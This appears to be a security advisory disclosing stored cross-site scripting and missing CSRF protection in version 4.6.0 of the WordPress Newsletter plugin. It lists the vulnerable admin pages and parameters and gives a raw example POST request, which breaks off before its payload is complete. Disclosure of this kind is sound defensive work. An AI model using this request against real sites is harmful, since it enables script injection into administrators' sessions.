Hello, Wordpress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ is vulnerable to CSRF and XSS. The issue is supposed to be fixed in version 4.6.1 . See https://wordpress.org/plugins/newsletter/changelog/ for more details. 1. Stored Cross-Site Scripting (XSS) Authenticated administrators can inject html/js code (there is no CSRF protection). *Injection Location: *http://localhost/wordpress/wp-admin/admin.php?page= newsletter_subscription_lists *Method: *POST *Retrieval Location: *http://localhost/wordpress/wp-admin/admin.php?page= newsletter_users_massive *Vulnerable Parameter(s): * options[list_1] options[list_2] options[list_3] options[list_4] options[list_5] options[list_6] options[list_7] options[list_8] options[list_9] options[list_10] options[list_11] options[list_12] options[list_13] options[list_14] options[list_15] options[list_16] options[list_17] options[list_18] options[list_19] options[list_20] *Example Attack:* *Request:* POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page= newsletter_subscription_lists Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 1762 act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin% 2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D= test&options%5Blist_1_status%5D=1&options%5Blist_1_checked% 5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0& options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options% 5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options% 5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_ checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status% 5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=& options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0& options%5Blist_7%5D=bi1x5